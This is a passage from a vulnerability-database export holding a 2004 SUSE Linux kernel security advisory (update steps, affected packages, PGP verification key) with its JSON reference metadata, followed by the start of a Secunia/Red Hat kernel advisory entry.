is\n    usually used to initialize SCSI drivers or NIC drivers for diskless\n    operation. \n\n    The variable INITRD_MODULES in /etc/sysconfig/kernel determines\n    which kernel modules will be loaded in the initrd before the kernel\n    has mounted its actual root filesystem. The variable should contain\n    your SCSI adapter (if any) or filesystem driver modules. \n\n    With the installation of the new kernel, the initrd has to be\n    re-packed with the update kernel modules. Please run the command\n\n      mk_initrd\n\n    as root to create a new init ramdisk (initrd) for your system. \n    On SuSE Linux 8.1 and later, this is done automatically when the\n    RPM is installed. \n\n\n  **** Step 5: bootloader\n\n    If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there\n    are two options:\n    Depending on your software configuration, you have either the lilo\n    bootloader or the grub bootloader installed and initialized on your\n    system. \n    The grub bootloader does not require any further actions to be\n    performed after the new kernel images have been moved in place by the\n    rpm Update command. \n    If you have a lilo bootloader installed and initialized, then the lilo\n    program must be run as root. Use the command\n\n      grep LOADER_TYPE /etc/sysconfig/bootloader\n\n    to find out which boot loader is configured. If it is lilo, then you\n    must run the lilo command as root. If grub is listed, then your system\n    does not require any bootloader initialization. \n\n    Warning: An improperly installed bootloader may render your system\n             unbootable. \n\n  **** Step 6: reboot\n\n    If all of the steps above have been successfully completed on your\n    system, then the new kernel including the kernel modules and the\n    initrd should be ready to boot. The system needs to be rebooted for\n    the changes to become active. Please make sure that all steps have\n    completed, then reboot using the command\n        shutdown -r now\n    or\n        init 6\n\n    Your system should now shut down and reboot with the new kernel. \n\n\n    There is no workaround known. \n\n\n    Please download the update package for your distribution and verify its\n    integrity by the methods listed in section 3) of this announcement. \n    Then, install the package using the command \"rpm -Fhv file.rpm\" to apply\n    the update. \n    Our maintenance customers are being notified individually. The packages\n    are being offered to install from the maintenance web. Update packages will be available soon. \n\n    - sitecopy\n    The sitecopy package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - cadaver\n    The cadaver package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - OpenOffice_org\n    The OpenOffice_org package includes a vulnerable version\n    of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages\n    will be available soon. \n\n    - tripwire\n    A format string bug in tripwire can be exploited locally\n    to gain root permissions. \n    New packages are available. \n\n    - postgresql\n    A buffer overflow in psqlODBC could be exploited to crash the\n    application using it. E.g. a PHP script that uses ODBC to access a\n    PostgreSQL database can be utilized to crash the surrounding Apache\n    web-server. Other parts of PostgreSQL are not affected. \n    New packages are available. \n\n    - XDM/XFree86\n    This update resolves random listening to ports by XDM\n    that allows to connect via the XDMCP. SUSE LINUX 9.1\n    is affected only. \n    New packages are available. \n\n    - mod_proxy\n    A buffer overflow can be triggered by malicious remote\n    servers that return a negative Content-Length value. \n    This vulnerability can be used to execute commands remotely\n    New packages are available. \n\n    - freeswan\n    A bug in the certificate chain authentication code could allow an\n    attacker to authenticate any host against a FreeS/WAN server by\n    presenting specially crafted certificates wrapped in a PKCS#7 file. \n    The packages are currently being tested and will be available soon. \n\n    - ipsec-tools\n    The racoon daemon which is responsible for handling IKE messages\n    fails to reject invalid or self-signed X.509 certificates which\n    allows for man-in-the-middle attacks on IPsec tunnels established\n    via racoon. \n    The packages are currently being tested and will be available soon. \n\n    - less\n    This update fixes a possible symlink attack in lessopen.sh. The\n    attack can be executed by local users to overwrite arbitrary files\n    with the privileges of the user running less. \n    New packages are available. \n\n    - libpng\n    This update adds a missing fix for CAN-2002-1363. \n    New packages are available. \n\n    - pavuk\n    This update fixes a remotely exploitable buffer overflow in pavuk. \n    Thanks to Ulf Harnhammar for reporting this to us. \n    New packages are available. \n\n    - kdebase3\n    This update fixes a possible attack on tmp files created at the\n    first login of a user using KDE or at the first time running a\n    KDE application. This bug can be exploited locally to overwrite\n    arbitrary files with the privilege of the victim user. \n    Just affects SUSE LINUX 9.1\n    New packages are available. \n\n______________________________________________________________________________\n\n3)  standard appendix: authenticity verification, additional information\n\n  - Package authenticity verification:\n\n    SUSE update packages are available on many mirror ftp servers around\n    the world. While this service is considered valuable and important\n    to the free and open source software community, many users wish to be\n    certain as to be the origin of the package and its content before\n    installing the package. There are two independent verification methods\n    that can be used to prove the authenticity of a downloaded file or\n    rpm package:\n    1) md5sums as provided in the (cryptographically signed) announcement. \n    2) using the internal gpg signatures of the rpm package. \n\n    1) execute the command\n        md5sum \u003cname-of-the-file.rpm\u003e\n       after you have downloaded the file from a SUSE ftp server or its\n       mirrors. Then, compare the resulting md5sum with the one that is\n       listed in the announcement. Since the announcement containing the\n       checksums is cryptographically signed (usually using the key\n       security@suse.de), the checksums offer proof of the authenticity\n       of the package. \n       We recommend against subscribing to security lists which cause the\n       email message containing the announcement to be modified so that\n       the signature does not match after transport through the mailing\n       list software. \n       Downsides: You must be able to verify the authenticity of the\n       announcement in the first place. If RPM packages are being rebuilt\n       and a new version of a package is published on the ftp server, all\n       md5 sums for the files are useless. \n\n    2) rpm package signatures provide an easy way to verify the authenticity\n       of an rpm package. Use the command\n        rpm -v --checksig \u003cfile.rpm\u003e\n       to verify the signature of the package, where \u003cfile.rpm\u003e is the\n       filename of the rpm package that you have downloaded. Of course,\n       package authenticity verification can only target an un-installed rpm\n       package file. \n       Prerequisites:\n        a) gpg is installed\n        b) The package is signed using a certain key. The public part of this\n           key must be installed by the gpg program in the directory\n           ~/.gnupg/ under the user\u0027s home directory who performs the\n           signature verification (usually root). You can import the key\n           that is used by SUSE in rpm packages for SUSE Linux by saving\n           this announcement to a file (\"announcement.txt\") and\n           running the command (do \"su -\" to be root):\n            gpg --batch; gpg \u003c announcement.txt | gpg --import\n           SUSE Linux distributions version 7.1 and thereafter install the\n           key \"build@suse.de\" upon installation or upgrade, provided that\n           the package gpg is installed. The file containing the public key\n           is placed at the top-level directory of the first CD (pubring.gpg)\n           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de . \n\n\n  - SUSE runs two security mailing lists to which any interested party may\n    subscribe:\n\n    suse-security@suse.com\n        -   general/linux/SUSE security discussion. \n            All SUSE security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-subscribe@suse.com\u003e. \n\n    suse-security-announce@suse.com\n        -   SUSE\u0027s announce-only mailing list. \n            Only SUSE\u0027s security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-announce-subscribe@suse.com\u003e. \n\n    For general information or the frequently asked questions (faq)\n    send mail to:\n        \u003csuse-security-info@suse.com\u003e or\n        \u003csuse-security-faq@suse.com\u003e respectively. \n\n    =====================================================================\n    SUSE\u0027s security contact is \u003csecurity@suse.com\u003e or \u003csecurity@suse.de\u003e. \n    The \u003csecurity@suse.de\u003e public key is listed below. \n    =====================================================================\n______________________________________________________________________________\n\n    The information in this advisory may be distributed or reproduced,\n    provided that the advisory is not modified in any way. In particular,\n    it is desired that the clear-text signature must show proof of the\n    authenticity of the text. \n    SUSE Linux AG makes no warranties of any kind whatsoever with respect\n    to the information contained in this security advisory. \n\nType Bits/KeyID    Date       User ID\npub  2048R/3D25D3D9 1999-03-06 SuSE Security Team \u003csecurity@suse.de\u003e\npub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key \u003cbuild@suse.de\u003e\n\n#####-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see http://www.gnupg.org\n\n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\nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=\n=LRKC\n- -----END PGP PUBLIC KEY BLOCK-----\n\n- -- \n -                                                                      -\n| Roman Drahtm\\xfcller      \u003cdraht@suse.de\u003e // \"You don\u0027t need eyes to see, |\n  SUSE Linux AG - Security       Phone: //             you need vision!\"\n| N\\xfcrnberg, Germany     +49-911-740530 //           Maxi Jazz, Faithless |\n -                                                                      -\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy\nBi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt\nOsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD\njwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA\niud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT\nWntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ==\n=24bz\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8925"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-8925",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8925"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0495",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "10566",
        "trust": 2.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045",
        "trust": 0.7
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:260",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:255",
        "trust": 0.6
      },
      {
        "db": "GENTOO",
        "id": "GLSA-200407-02",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2004:020",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2004:846",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2004:845",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:2961",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:10155",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2004:066",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2004-186",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "16449",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "33705",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-8925",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8925"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ]
  },
  "id": "VAR-200408-0118",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8925"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:40:05.119000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel_30",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_30.html"
      },
      {
        "title": "kernel_se20",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_se20.html"
      },
      {
        "title": "RHSA-2004:260",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-260.html"
      },
      {
        "title": "RHSA-2004:255",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-255.html"
      },
      {
        "title": "RHSA-2004:327",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-327.html"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/"
      },
      {
        "title": "RHSA-2004:327",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-327j.html"
      },
      {
        "title": "RHSA-2004:260",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-260j.html"
      },
      {
        "title": "RHSA-2004:255",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-255j.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/10566"
      },
      {
        "trust": 1.7,
        "url": "http://lwn.net/articles/91155/"
      },
      {
        "trust": 1.7,
        "url": "http://security.gentoo.org/glsa/glsa-200407-02.xml"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandrakesecure.net/en/advisories/advisory.php?name=mdksa-2004:066"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-255.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-260.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.novell.com/linux/security/advisories/2004_20_kernel.html"
      },
      {
        "trust": 1.6,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000845"
      },
      {
        "trust": 1.6,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000846"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10155"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a2961"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16449"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0495"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0495"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/16449"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:10155"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:2961"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-255.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-260.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-327.html"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000845"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0535"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0497"
      },
      {
        "trust": 0.1,
        "url": "http://www.gnupg.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0626"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0496"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8925"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-8925"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-08-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8925"
      },
      {
        "date": "2004-06-18T00:00:00",
        "db": "BID",
        "id": "10566"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "date": "2004-07-02T12:32:00",
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "date": "2004-08-06T04:00:00",
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "date": "2004-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8925"
      },
      {
        "date": "2007-01-17T21:30:00",
        "db": "BID",
        "id": "10566"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000233"
      },
      {
        "date": "2017-10-11T01:29:26.717000",
        "db": "NVD",
        "id": "CVE-2004-0495"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Multiple Device Driver Vulnerabilities",
    "sources": [
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-045"
      }
    ],
    "trust": 0.9
  }
}

var-200710-0169
Vulnerability from variot

The eHCA driver in Linux kernel 2.6 before 2.6.22, when running on PowerPC, does not properly map userspace resources, which allows local users to read portions of physical address space. The Linux kernel is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain a portion of the physical address space. Information harvested may aid in further attacks.


Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.

The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,700 different Windows applications.

Request your account, the Secunia Network Software Inspector (NSI): http://secunia.com/network_software_inspector/


TITLE: Red Hat update for kernel

SECUNIA ADVISORY ID: SA27322

VERIFY ADVISORY: http://secunia.com/advisories/27322/

CRITICAL: Moderately critical

IMPACT: Security Bypass, DoS

WHERE:

From remote

OPERATING SYSTEM: Red Hat Enterprise Linux (v. 5 server) http://secunia.com/product/13652/ Red Hat Enterprise Linux Desktop (v. 5 client) http://secunia.com/product/13653/

DESCRIPTION: Red Hat has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users to bypass certain security restrictions and to cause a DoS (Denial of Service), and by malicious people to cause a DoS.

For more information: SA25594 SA25895 SA26322 SA26935

SOLUTION: Updated packages are available via Red Hat Network. http://rhn.redhat.com

ORIGINAL ADVISORY: https://rhn.redhat.com/errata/RHSA-2007-0940.html

OTHER REFERENCES: SA25594: http://secunia.com/advisories/25594/

